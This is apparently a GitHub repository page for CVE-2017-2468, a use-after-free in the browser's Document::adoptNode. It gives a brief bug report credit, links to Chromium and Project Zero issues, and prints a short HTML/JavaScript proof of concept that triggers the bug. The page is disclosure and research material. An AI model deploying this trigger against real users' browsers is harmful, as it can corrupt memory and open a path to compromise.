Skip to content

Latest commit

 

History

History

CVE-2017-2468

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 
 
 

Use-After-Free via Document::adoptNode

Reported by [email protected], Jan 23 2017

This is a regression test from: https://crbug.com/541206

PoC:

<body>
<script>

var s = document.body.appendChild(document.createElement('script'));
s.type = '0';
s.textContent = 'document.body.appendChild(parent.i0)';

var i0 = s.appendChild(document.createElement('iframe'));
s.type = '';

var f = document.body.appendChild(document.createElement('iframe'));
f.contentDocument.adoptNode(i0);
f.src = 'about:blank';

</script>
</body>

Link: https://bugs.chromium.org/p/project-zero/issues/detail?id=1099